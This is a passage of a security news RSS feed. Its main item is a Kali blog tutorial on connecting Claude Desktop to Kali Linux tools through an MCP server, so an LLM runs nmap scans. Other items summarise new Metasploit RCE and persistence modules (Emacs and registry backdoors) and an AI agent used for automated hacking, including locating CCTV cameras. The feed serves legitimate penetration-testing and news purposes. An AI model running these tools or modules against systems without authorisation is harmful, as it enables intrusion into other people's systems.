href="https://www.rapid7.com/products/metasploit/download/"><span>Metasploit Pro</span></a></p><p></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Kali & LLM: macOS with Claude Desktop GUI & Anthropic Sonnet LLM]]></title>
<description><![CDATA[This post will focus on an alternative method of using Kali Linux, moving beyond direct terminal command execution. Instead, we will leverage a Large Language Model (LLM) to translate “natural language” descriptions of desired actions into technical commands. Achieving this setup requires the int...]]></description>
<link>https://tsecurity.de/de/3310476/tools/kali-llm-macos-with-claude-desktop-gui-anthropic-sonnet-llm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3310476/tools/kali-llm-macos-with-claude-desktop-gui-anthropic-sonnet-llm/</guid>
<pubDate>Wed, 25 Feb 2026 18:21:41 +0100</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>This post will focus on an alternative method of using Kali Linux, moving beyond direct terminal command execution. Instead, we will leverage a Large Language Model (LLM) to translate “natural language” descriptions of desired actions into technical commands. Achieving this setup requires the integration of three distinct systems:</p>
<ul>
<li>UI: Apple’s macOS <em>(Can also use Microsoft Windows, but not covered in this guide)</em> - with Claude Desktop</li>
<li>Attacking box: Kali Linux - using various tools</li>
<li>LLM: <em>In the cloud</em> - Anthropic’s Sonnet 4.5 </li>
</ul>
<hr>
<p>The LLM is only part of the story. When paired with Model Context Protocol (MCP)’s, it allows/enables the LLM to seamlessly connect with external sources (data, programs/tools etc).
At a very high level:</p>
<ol>
<li>We can ask a LLM to-do a task via a “prompt”.</li>
</ol>
<ul>
<li><em>“Can you please port scan <code>scanme.nmap.org</code>, if you find a valid web server, check if <code>security.txt</code> exists”</em></li>
</ul>
<ol start="2">
<li>The LLM will understand what we asked it to-do.</li>
</ol>
<ul>
<li><em>“First task, I need to use Nmap/Network Mapper to-do a port scan of scan <code>scanme.nmap.org</code>”</em></li>
</ul>
<ol start="3">
<li>LLM will then request the MCP to-do any action(s).</li>
</ol>
<ul>
<li><em>“Is Nmap installed? Can I access it?”</em></li>
</ul>
<ol start="4">
<li>MCP will run the request and return results</li>
</ol>
<ul>
<li><em><code>$ nmap scanme.nmap.org</code></em></li>
</ul>
<ol start="5">
<li>The LLM will process the results as well as showing it to us as end-users.</li>
</ol>
<ul>
<li><em>“I found that <code>scanme.nmap.org</code> is up, and contains a web server on port 80/TCP &amp; 443/TCP.”</em></li>
</ul>
<ol start="6">
<li>If needed, could be a loop, and re-run a command/action again back in the MCP until the prompt has been completed/full-filled.</li>
</ol>
<ul>
<li><em>“Now I need see if <code>/.well-known/security.txt</code> gives <code>HTTP 200</code> response”</em></li>
</ul>
<div class="notices info">
<p data-header="Info">
Just like the joys of text editors wars <em>(<code>vim</code> vs <code>emacs</code> vs <code>nano</code>)</em>, this is not to say its the “best” way to-do it. This is <strong>a way</strong>.<br>
This scenario may work for you, or it may not be acceptable to you <em>(e.g. privacy)</em>. That is fine.<br>
</p>
</div>
<hr>
<p>If you are wonder “Why this setup? Why are you using multiple OSes?”, there are various reasons why!</p>
<ul>
<li>You may want a graphical user interface (GUI), which Claude Desktop is.
<ul>
<li>Its an official product from Anthropic, who is making the model we want to run. However Claude Desktop is not officially supported on Linux.</li>
<li>There are workarounds (e.g. <a href="https://github.com/aaddrick/claude-desktop-debian">community packages</a> or <a href="https://www.winehq.org/">WINE</a>, as well as other solutions, such as <a href="https://github.com/nanbingxyz/5ire">5ire</a>, <a href="https://anythingllm.com/">AnythingLLM</a>, <a href="https://block.github.io/goose/">Goose (Desktop)</a> &amp; <a href="https://witsyai.com/">Witsy</a></li>
</ul>
</li>
<li>It being “free”.
<ul>
<li><em>At the time of writing, 2026-01</em></li>
</ul>
</li>
<li>Speed
<ul>
<li>Having Kali running in “the cloud”, may have greater network connection , or be closer to your target - thus speeding things up!</li>
</ul>
</li>
</ul>
<h2>SSH</h2>
<p>We are going to want our macOS box, to be able to talk/interact/communicate to Kali.
For this, we will use SSH.</p>
<h3>Kali Setup</h3>
<p>First up, Kali.
If you are using Kali in the cloud, you likely already have SSH pre-setup.
If SSH is not setup, let’s quickly install and run:</p>
<pre><code class="language-console">$ sudo apt update
[...]
$
$ sudo apt install -y openssh-server
[...]
$
$ sudo systemctl enable --now ssh
[...]
$
</code></pre>
<h3>macOS</h3>
<p>Switching over to our macOS machine, open up <code>Terminal</code> <em>(or similar program)</em>, and either find out public SSH key or generate one:</p>
<pre><code class="language-console">user@Users-MacBook-Pro ~ % ls -lah .ssh
ls: .ssh: No such file or directory
user@Users-MacBook-Pro ~ %
</code></pre>
<p>This is a clean install, so we will be generating a new key.</p>
<hr>
<p>Generating a new SSH key, is the same steps as doing it on Linux:</p>
<pre><code class="language-console">user@Users-MacBook-Pro ~ % ssh-keygen
Generating public/private ed25519 key pair.
Enter file in which to save the key (/Users/user/.ssh/id_ed25519):
Created directory '/Users/user/.ssh'.
Enter passphrase for "/Users/user/.ssh/id_ed25519" (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /Users/user/.ssh/id_ed25519
Your public key has been saved in /Users/user/.ssh/id_ed25519.pub
The key fingerprint is:
SHA256:9JWMFmD6Jhq9gSLVrWSQaqR0hOOfGC5wd/HoMW1CoKU user@Users-MacBook-Pro.local
The key's randomart image is:
+--[ED25519 256]--+
| +oo. o.. |
| =.B .oo + . |
|=.E +.o=. o + |
|+=.o.+*o+o . |
|=.=.=o+=S . |
|.+ + o.= |
|. . . |
| |
| |
+----[SHA256]-----+
user@Users-MacBook-Pro ~ %
user@Users-MacBook-Pro ~ % cat ~/.ssh/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFVZPT158E6mNNGrtOXTBQtK/7sXj09gRGZjkyMt82hs user@Users-MacBook-Pro.local
user@Users-MacBook-Pro ~ %
</code></pre>
<p><em>Password is not shown</em></p>
<hr>
<p>Now, lets add that public SSH key from macOS to Kali, allowing for key authentication.
Our Kali is located at <code>192.168.1.30</code>, change the IP to match your setup:</p>
<pre><code class="language-console">user@Users-MacBook-Pro ~ % ssh-copy-id kali@192.168.1.30
/usr/bin/ssh-copy-id: INFO: Source of key(s) to be installed: "/Users/user/.ssh/id_ed25519.pub"
The authenticity of host '192.168.1.30 (192.168.1.30)' can't be established.
ED25519 key fingerprint is SHA256:s1EHXZomZxup5ybdUSgTJwnyjwrMBxFSmAgt4+ijhws.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
/usr/bin/ssh-copy-id: INFO: attempting to log in with the new key(s), to filter out any that are already installed
/usr/bin/ssh-copy-id: INFO: 1 key(s) remain to be installed -- if you are prompted now it is to install the new keys
kali@192.168.1.30's password:
Number of key(s) added: 1
Now try logging into the machine, with: "ssh 'kali@192.168.1.30'"
and check to make sure that only the key(s) you wanted were added.
user@Users-MacBook-Pro ~ %
</code></pre>
<p><em>Password is not shown</em></p>
<p>This hopefully will be the last time you need to type in your Kali password when connecting via SSH!</p>
<hr>
<h3>Testing</h3>
<p>Finally, let’s test it out:</p>
<pre><code class="language-console">user@Users-MacBook-Pro ~ % ssh kali@192.168.1.30
Linux kali 6.16.8+kali-amd64 #1 SMP PREEMPT_DYNAMIC Kali 6.16.8-1kali1 (2025-09-24) x86_64
The programs included with the Kali GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Kali GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Jan 21 13:47:48 2026 from 192.168.30.153
┏━(Message from Kali developers)
┃
┃ This is a minimal installation of Kali Linux, you likely
┃ want to install supplementary tools. Learn how:
┃ ⇒ https://www.kali.org/docs/troubleshooting/common-minimum-setup/
┃
┗━(Run: “touch ~/.hushlogin” to hide this message)
┌──(kali㉿kali)-[~]
└─$
</code></pre>
<p><em>Please replace <code>192.168.1.30</code> with <strong>YOUR</strong> Kali IP address.</em></p>
<p>Boom!</p>
<h2>MCP Server (MCP Kali Server)</h2>
<p>Now that we have a console on Kali, let’s continue our MCP server setup. There are many of MCP server options out there already with more being created every day.
We will be using <a href="https://www.kali.org/tools/mcp-kali-server/">mcp-kali-server</a>:</p>
<pre><code class="language-console">$ sudo apt install -y mcp-kali-server
[...]
$
$ kali-server-mcp
2026-01-21 13:54:41,734 [INFO] Starting Kali Linux Tools API Server on 127.0.0.1:5000
* Serving Flask app 'kali_server'
* Debug mode: off
2026-01-21 13:54:41,748 [INFO] WARNING: This is a development server. Do not use it in a production deployment. Use a production WSGI server instead.
* Running on http://127.0.0.1:5000
2026-01-21 13:54:41,748 [INFO] Press CTRL+C to quit
</code></pre>
<div class="notices info">
<p data-header="Info">
<em>Long term, there are various different ways to have <code>kali-server-mcp</code> running in the background, such as using a tmux/screen session, or creating a systemd.unit, but that is out of scope for this post.</em>
</p>
</div>
<h3>Testing</h3>
<p>To test that everything so far is working, in another terminal run <code>mcp-server</code> (this is what our MCP client, Claude Desktop, will end up running):</p>
<pre><code class="language-console">$ mcp-server
2026-01-21 14:03:25,804 [INFO] Initialized Kali Tools Client connecting to http://localhost:5000
2026-01-21 14:03:25,812 [INFO] Successfully connected to Kali API server at http://localhost:5000
2026-01-21 14:03:25,812 [INFO] Server health status: healthy
2026-01-21 14:03:25,812 [WARNING] Not all essential tools are available on the Kali server
2026-01-21 14:03:25,812 [WARNING] Missing tools: dirb, gobuster, nikto, nmap
2026-01-21 14:03:25,828 [INFO] Starting Kali MCP server
</code></pre>
<p>Did you see anything wrong? Did you spot the warning?</p>
<blockquote>
<p>Missing tools: <a href="https://www.kali.org/tool/dirb/">dirb</a>, <a href="https://www.kali.org/tools/gobuster/">gobuster</a>, <a href="https://www.kali.org/tools/nikto/">nikto</a>, <a href="https://www.kali.org/tools/nmap/">nmap</a></p>
</blockquote>
<hr>
<p>Let’s install them now (as well other tools which <code>mcp-kali-server</code> can use), we can re-use the <code>mcp-server</code> terminal before closing it:</p>
<pre><code class="language-console">2026-01-21 14:03:25,828 [INFO] Starting Kali MCP server
^C
[...]
$
$ sudo apt install -y mcp-kali-server dirb gobuster nikto nmap enum4linux-ng hydra john metasploit-framework sqlmap wpscan wordlists
[...]
$
$ sudo gunzip -v /usr/share/wordlists/rockyou.txt.gz # Alt: `$ wordlists`
/usr/share/wordlists/rockyou.txt.gz: 61.9% -- replaced with /usr/share/wordlists/rockyou.txt
$
$ exit
</code></pre>
<p><em>Our Kali installation was a <a href="https://www.kali.org/docs/troubleshooting/common-minimum-setup/">minimal installation</a>, without any tools pre-installed, which is why this happened.</em></p>
<h2>Claude Desktop</h2>
<p>Time to switch machines, and on macOS, download <a href="https://claude.com/download">Claude Desktop</a>. This will be our interface to the LLM, and it also is a MCP client, which will talk to our MCP server (<code>mcp-kali-server</code>), which will run commands on Kali.</p>
<p><a href="https://claude.ai/api/desktop/darwin/universal/dmg/latest/redirect">Download Claude.dmg</a> <em>(At the time of writing (2026-01-21), latest version <code>v1.1.381-c2a39e</code>)</em></p>
<p>Afterwards, open <code>Claude.dmg</code> and copy <code>Claude.app</code> into Applications before running it.</p>
<div class="notices info">
<p data-header="Info">
If you are using Microsoft Windows, setup should be similar, but it is out of scope for this post.
</p>
</div>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-01-Install.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-01-Install.png" alt="Figure 01 - Install">
</a>
</p>

<hr>
<p>Now, we need to follow the complete the first time items, and follow the steps to to register/sign in</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-07-MainScreen.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-07-MainScreen.png" alt="Figure 07 - Main Screen">
</a>
</p>

<div class="notices info">
<p data-header="Info">
At the time of writing (2026-01), Claude Desktop is on Apple macOS and Microsoft Windows. There is not an official Linux build.<br>
<br>
Others have reported that using <a href="https://www.winehq.org/">WINE</a> is possible, as well as other <a href="https://github.com/aaddrick/claude-desktop-debian">unofficial Linux builds</a> - You do you (and at your own risk!)<br>
<br>
Using Claude Code, requires a API key, which at the time of writing, does not have a free-tier option.
</p>
</div>
<hr>
<h2>MCP Client (Claude Desktop)</h2>
<p>With all that out of the way, we need to setup Claude Desktop’s MCP client.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-08-Settings.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-08-Settings.png" alt="Figure 08 - Settings">
</a>
</p>

<p>Open settings (Claude -&gt; Settings), then find <code>Deveploper</code> (Under <code>Desktop app</code>), and click <code>Edit Config</code>.</p>
<p>Finder should open up with <code>claude_desktop_config.json</code> highlighted (otherwise: <code>/Users/[USERNAME]/Library/Application Support/Claude/claude_desktop_config.json</code>).</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-10-DeveloperFinder.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-10-DeveloperFinder.png" alt="Figure 10 - Developer macOS Finder">
</a>
</p>

<p>Open/edit the file using your text editor of choice, and paste in:</p>
<pre><code class="language-json">{
"mcpServers": {
"mcp-kali-server": {
"command": "ssh",
"args": [
"kali@192.168.1.30",
"mcp-server"
],
"transport": "stdio"
}
}
}
</code></pre>
<p><em>Please replace <code>192.168.1.30</code> with YOUR Kali IP address as before.</em></p>
<p>So for us, it looks like:</p>
<pre><code class="language-console">user@Users-MacBook-Pro ~ % cat /Users/user/Library/Application\ Support/Claude/claude_desktop_config.json | jq
{
"preferences": {
"quickEntryShortcut": "off",
"menuBarEnabled": false
},
"mcpServers": {
"mcp-kali-server": {
"command": "ssh",
"args": [
"-i",
"/Users/user/.ssh/id_ed25519",
"kali@192.168.1.30",
"mcp-server"
],
"transport": "stdio"
}
}
}
user@Users-MacBook-Pro ~ %
</code></pre>
<hr>
<p>Finally restart Claude Desktop by quitting and re-opening for our settings to take affect.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-13-DeveloperRunning.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-13-DeveloperRunning.png" alt="Figure 13 - Developer Running">
</a>
</p>

<h3>Testing</h3>
<p>Let’s see what all the hype about and give it a quick spin:</p>
<blockquote>
<p>Can you please do a port scan for me on <code>scanme.nmap.org</code>?</p>
</blockquote>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-14-Prompt.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-14-Prompt.png" alt="Figure 14 - Prompt">
</a>
</p>

<hr>
<p>Claude will check if we trust the MCP, and if we wish to run commands.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-15-MCPPermissions.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-15-MCPPermissions.png" alt="Figure 15 - MCP Permissions">
</a>
</p>

<hr>
<p>Afterwards, we just wait.</p>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-16-Running.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-16-Running.png" alt="Figure 16 - Running">
</a>
</p>

<p>If you are impatient, you can peek behind the curtain a little bit by checking the logs!
In the terminal which we ran <code>kali-server-mcp</code>, we can then see:</p>
<pre><code class="language-console">2026-01-21 14:20:21,688 [INFO] Executing command: which nmap
2026-01-21 14:20:21,690 [INFO] Executing command: which gobuster
2026-01-21 14:20:21,692 [INFO] Executing command: which dirb
2026-01-21 14:20:21,693 [INFO] Executing command: which nikto
2026-01-21 14:20:21,695 [INFO] 127.0.0.1 - - [21/Jan/2026 14:20:21] "GET /health HTTP/1.1" 200 -
2026-01-21 14:21:25,385 [INFO] Executing command: nmap -sV scanme.nmap.org
2026-01-21 14:21:39,295 [INFO] 127.0.0.1 - - [21/Jan/2026 14:21:39] "POST /api/tools/nmap HTTP/1.1" 200 -
</code></pre>
<p></p><p>
<a href="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-19-ResultsFull.png" target="_blank">
<img src="https://www.kali.org/blog/kali-llm-claude-desktop/images/ClaudeDesktop-19-ResultsFull.png" alt="Figure 19 - Results Full">
</a>
</p>

<h2>Recap</h2>
<p>In review:</p>
<ul>
<li>We have a Kali instance running (could be on the same network, or in the Cloud).</li>
<li>On Kali, we setup SSH service to allow for secure communication.</li>
<li>On Kali, we ran <code>MCP-Kali-Server</code> for our MCP server.
<ul>
<li>We also made sure Kali has the needed tools installed!</li>
</ul>
</li>
<li>On macOS, we setup Claude Desktop, and configured a MCP client.
<ul>
<li>macOS can SSH into our Kali box, to run <code>MCP-Kali-Server</code>’s client.</li>
</ul>
</li>
<li>We then used Anthropic’s <code>Sonnet 4.5</code> LLM to-do a <code>nmap</code> port scan of <code>scanme.nmap.org</code>.</li>
</ul>
<p>…and we did this for “free”!</p>
<p><em>We may be talking about AI, but AI was not used to write this!</em></p>
<hr>
<p><em>Find out more about advanced red teaming for AI environments at <a href="https://www.offsec.com/courses/osai/?utm_source=kali&amp;utm_medium=web&amp;utm_campaign=blog">OffSec.com</a></em></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Imposter Alert: Extracting and Reversing Metasploit Payloads (Flare-On 2020 Challenge 7)]]></title>
<description><![CDATA[I recently participated in FireEye’s seventh annual Flare-On Challenge, a reverse engineering and malware analysis Capture The Flag (CTF) competition. Out of the 11 challenges ranging from typical executables to games written in exotic programming languages, I liked Challenge 7 the best.]]></description>
<link>https://tsecurity.de/de/3303402/it-security-nachrichten/imposter-alert-extracting-and-reversing-metasploit-payloads-flare-on-2020-challenge-7/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3303402/it-security-nachrichten/imposter-alert-extracting-and-reversing-metasploit-payloads-flare-on-2020-challenge-7/</guid>
<pubDate>Sun, 22 Feb 2026 17:36:15 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[I recently participated in FireEye’s <a href="https://www.fireeye.com/blog/threat-research/2020/08/announcing-the-seventh-annual-flare-on-challenge.html" target="_blank" rel="noopener">seventh annual Flare-On Challenge</a>, a reverse engineering and malware analysis Capture The Flag (CTF) competition. Out of the 11 challenges ranging from typical executables to games written in exotic programming languages, I liked Challenge 7 the best.]]></content:encoded>
</item>
<item>
<title><![CDATA[Metasploit Wrap-Up 02/20/2026]]></title>
<description><![CDATA[Hacking Churches and Backdooring EmacsThis release packs some solid exploit module additions! Two new unauthenticated RCE modules are a major win: the StoryChief WordPress plugin exploit (CVE-2025-7441) targets a webhook validation flaw allowing arbitrary file uploads, while the ChurchCRM exploit...]]></description>
<link>https://tsecurity.de/de/3300999/it-security-nachrichten/metasploit-wrap-up-02202026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3300999/it-security-nachrichten/metasploit-wrap-up-02202026/</guid>
<pubDate>Fri, 20 Feb 2026 23:19:36 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p></p><h2>Hacking Churches and Backdooring Emacs</h2><p>This release packs some solid exploit module additions! Two new unauthenticated RCE modules are a major win: the <strong>StoryChief WordPress plugin exploit</strong> (CVE-2025-7441) targets a webhook validation flaw allowing arbitrary file uploads, while the <strong>ChurchCRM exploit</strong> (CVE-2025-62521) abuses the installation wizard to inject PHP code for persistent access. Both establish Meterpreter sessions. On the persistence front, there's a creative <strong>Emacs extension module</strong> that plants malicious Lisp code for shell callbacks whenever Emacs launches; a fun take on an unconventional attack surface. Along with Emacs, a new Windows persistence using the old, gold registry; this time the UserInit one, to get Administrator shells when any user logs in. To wrap-up, now you can spread automation nightmares with the new n8n auxiliary module, allowing you to extract sessions of other logged users (even admins).</p><h2>New module content (5)</h2><h3>n8n arbitrary file read</h3><p>Authors: dor attias and msutovsky-r7</p><p>Type: Auxiliary</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20856">#20856</a> contributed by <a href="https://github.com/msutovsky-r7">msutovsky-r7</a></p><p>Path: gather/ni8mare_cve_2026_21858</p><p>Description: This adds an exploit module for n8n. The vulnerability, known as Ni8mare, allows arbitrary file read and session extraction of other users allowing privilege escalation on the WebApp context.</p><h3>Emacs Extension Persistence</h3><p>Author: h00die</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20919">#20919</a> contributed by <a href="https://github.com/h00die">h00die</a></p><p>Path: linux/persistence/emacs_extension</p><p>Description: This adds a persistence module compatible with emacs for Linux, the emacs extension will trigger a session creation as the compromised user.</p><h3>ChurchCRM Unauthenticated RCE 6.8.0</h3><p>Author: LucasCsmt</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20947">#20947</a> contributed by <a href="https://github.com/LucasCsmt">LucasCsmt</a></p><p>Path: multi/http/churchcrm_install_unauth_rce</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-62521&amp;referrer=blog">CVE-2025-62521</a></p><p>Description: This PR adds a new exploit module for CVE-2025-62521, targeting an unauthenticated Remote Code Execution (RCE) vulnerability in ChurchCRM versions 6.8.0 and earlier.</p><h3>WordPress StoryChief Plugin Unauthenticated RCE</h3><p>Authors: Nayera and xpl0dec</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20976">#20976</a> contributed by <a href="https://github.com/Nayeraneru">Nayeraneru</a></p><p>Path: multi/http/wp_plugin_story_chef_file_upload</p><p>AttackerKB reference: <a href="https://attackerkb.com/search?q=CVE-2025-7441&amp;referrer=blog">CVE-2025-7441</a></p><p>Description: Adds a new exploit module targeting CVE-2025-7441, an unauthenticated RCE in the WordPress plugin StoryChief versions &lt;= 1.0.45.</p><h3>Windows Registry Persistence via Userinit</h3><p>Authors: h00die and joel</p><p>Type: Exploit</p><p>Pull request: <a href="https://github.com/rapid7/metasploit-framework/pull/20844">#20844</a> contributed by <a href="https://github.com/6a6f656c">6a6f656c</a></p><p>Path: windows/persistence/registry_userinit</p><p>Description: This adds a persistence module for Windows. Using the UserInit registry key the target machine will create a session with Admin privileges every time any user logs in.</p><h2>Enhancements and features (2)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20807">#20807</a> from <a href="https://github.com/webbsssss">webbsssss</a> - Allow Acunetix vulnerabilities to be imported without complete web page data.</li><li><a href="https://github.com/rapid7/metasploit-framework/pull/20969">#20969</a> from <a href="https://github.com/sjanusz-r7">sjanusz-r7</a> - Updates Metasploit's logic when importing Acunetix XML files to now also include items that are less than High severity.</li></ul><h2>Bugs fixed (1)</h2><ul><li><a href="https://github.com/rapid7/metasploit-framework/pull/20972">#20972</a> from <a href="https://github.com/adfoster-r7">adfoster-r7</a> - Fixes false positives on lg simple editor check methods.</li></ul><h2>Documentation</h2><p>You can find the latest Metasploit documentation on our docsite at <a href="https://docs.metasploit.com/">docs.metasploit.com</a>.</p><h2>Get it</h2><p>As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:</p><ul><li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222026-02-13T12%3A01%3A15Z..2026-02-19T09%3A16%3A01Z%22">Pull Requests 6.4.114...6.4.115</a></li><li><a href="https://github.com/rapid7/metasploit-framework/compare/6.4.114...6.4.115">Full diff 6.4.114...6.4.115</a></li></ul><p>If you are a git user, you can clone the <a href="https://github.com/rapid7/metasploit-framework">Metasploit Framework repo</a> (master branch) for the latest. To install fresh without using git, you can use the open-source-only <a href="https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers">Nightly Installers</a> or the commercial edition <a href="https://www.rapid7.com/products/metasploit/download/">Metasploit Pro</a></p><p></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PentAGI – Automated AI-Powered Penetration Testing Tool that Integrates 20+ Security Tools]]></title>
<description><![CDATA[PentAGI introduces an AI-driven approach to penetration testing, automating complex workflows with tools like Nmap and Metasploit while generating detailed reports. Developed by VXControl and released on GitHub in early 2025, this open-source platform empowers security professionals to conduct au...]]></description>
<link>https://tsecurity.de/de/3299493/it-security-nachrichten/pentagi-automated-ai-powered-penetration-testing-tool-that-integrates-20-security-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3299493/it-security-nachrichten/pentagi-automated-ai-powered-penetration-testing-tool-that-integrates-20-security-tools/</guid>
<pubDate>Fri, 20 Feb 2026 09:20:18 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>PentAGI introduces an AI-driven approach to penetration testing, automating complex workflows with tools like Nmap and Metasploit while generating detailed reports. Developed by VXControl and released on GitHub in early 2025, this open-source platform empowers security professionals to conduct autonomous…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/pentagi-automated-ai-powered-penetration-testing-tool-that-integrates-20-security-tools/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/pentagi-automated-ai-powered-penetration-testing-tool-that-integrates-20-security-tools/">PentAGI – Automated AI-Powered Penetration Testing Tool that Integrates 20+ Security Tools</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[PentAGI – Automated AI-Powered Penetration Testing Tool that Integrates 20+ Security Tools]]></title>
<description><![CDATA[PentAGI introduces an AI-driven approach to penetration testing, automating complex workflows with tools like Nmap and Metasploit while generating detailed reports. Developed by VXControl and released on GitHub in early 2025, this open-source platform empowers security professionals to conduct au...]]></description>
<link>https://tsecurity.de/de/3299469/it-security-nachrichten/pentagi-automated-ai-powered-penetration-testing-tool-that-integrates-20-security-tools/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3299469/it-security-nachrichten/pentagi-automated-ai-powered-penetration-testing-tool-that-integrates-20-security-tools/</guid>
<pubDate>Fri, 20 Feb 2026 09:05:30 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>PentAGI introduces an AI-driven approach to penetration testing, automating complex workflows with tools like Nmap and Metasploit while generating detailed reports. Developed by VXControl and released on GitHub in early 2025, this open-source platform empowers security professionals to conduct autonomous assessments in isolated Docker environments. The tool stands out for its fully autonomous AI agents […]</p>
<p>The post <a href="https://cybersecuritynews.com/pentagi-penetration-testing-tool/">PentAGI – Automated AI-Powered Penetration Testing Tool that Integrates 20+ Security Tools</a> appeared first on <a href="https://cybersecuritynews.com/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[I Built an AI Agent That Hacks for Me | OpenClaw + Kali Linux]]></title>
<description><![CDATA[Author: zSecurity - Bewertung: 71x - Views:351 Building a fully autonomous AI hacking rig using OpenClaw running on a Kali Linux cloud server. 🔴 Use the code ZSECURITY to get up to 74% discount on Hostinger's VPS to host your own Kali machine with OpenClaw ;)👇
https://www.hostinger.com/zsecurity
...]]></description>
<link>https://tsecurity.de/de/3297591/videos/i-built-an-ai-agent-that-hacks-for-me-openclaw-kali-linux/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3297591/videos/i-built-an-ai-agent-that-hacks-for-me-openclaw-kali-linux/</guid>
<pubDate>Thu, 19 Feb 2026 12:46:38 +0100</pubDate>
<category>🎥 Videos</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: zSecurity - Bewertung: 71x - Views:351 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/C5ir_rQ4L4g?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>Building a fully autonomous AI hacking rig using OpenClaw running on a Kali Linux cloud server. 🔴 Use the code ZSECURITY to get up to 74% discount on Hostinger's VPS to host your own Kali machine with OpenClaw ;)👇<br />
https://www.hostinger.com/zsecurity<br />
<br />
Unlike standard AI chatbots, this agent has direct access to tools like Nmap, Metasploit, and the web browser - allowing it to actually execute the tasks you give it.<br />
<br />
We’ll cover everything from setting up the cloud infrastructure to connecting the AI "brain" (using models like Claude 4.6 Opus or DeepSeek via OpenRouter) and configuring it to report back to your phone.<br />
<br />
⏱️ Timestamps:<br />
0:00 - Intro: Finding CCTV cameras with AI<br />
0:27 - What is OpenClaw?<br />
1:35 - Why we run this on Kali Linux<br />
2:12 - Setting up the Cloud VPS<br />
3:57 - Creating Secure SSH Keys<br />
5:15 - Connecting to your Cloud Kali Machine<br />
6:06 - Securing your Server<br />
7:44 - Installing OpenClaw<br />
8:34 - Configuring OpenClaw<br />
9:20 - Connecting the AI Brain (OpenRouter Setup)<br />
11:50 - Linking to Telegram (Creating the Bot)<br />
13:14 - Security: Setting up the Allowlist<br />
14:15 - Waking up the Agent & First Prompt<br />
15:35 - Installing Essential Skills (Stealth Browser & Search)<br />
17:35 - The "Expert Hacker" System Prompt<br />
19:00 - Demo 1: Locating CCTV Cameras<br />
19:50 - Demo 2: Automated OSINT & Vulnerability Scanning<br />
22:50 - Reviewing the Hacking Reports<br />
24:15 - Conclusion & Next Steps<br />
<br />
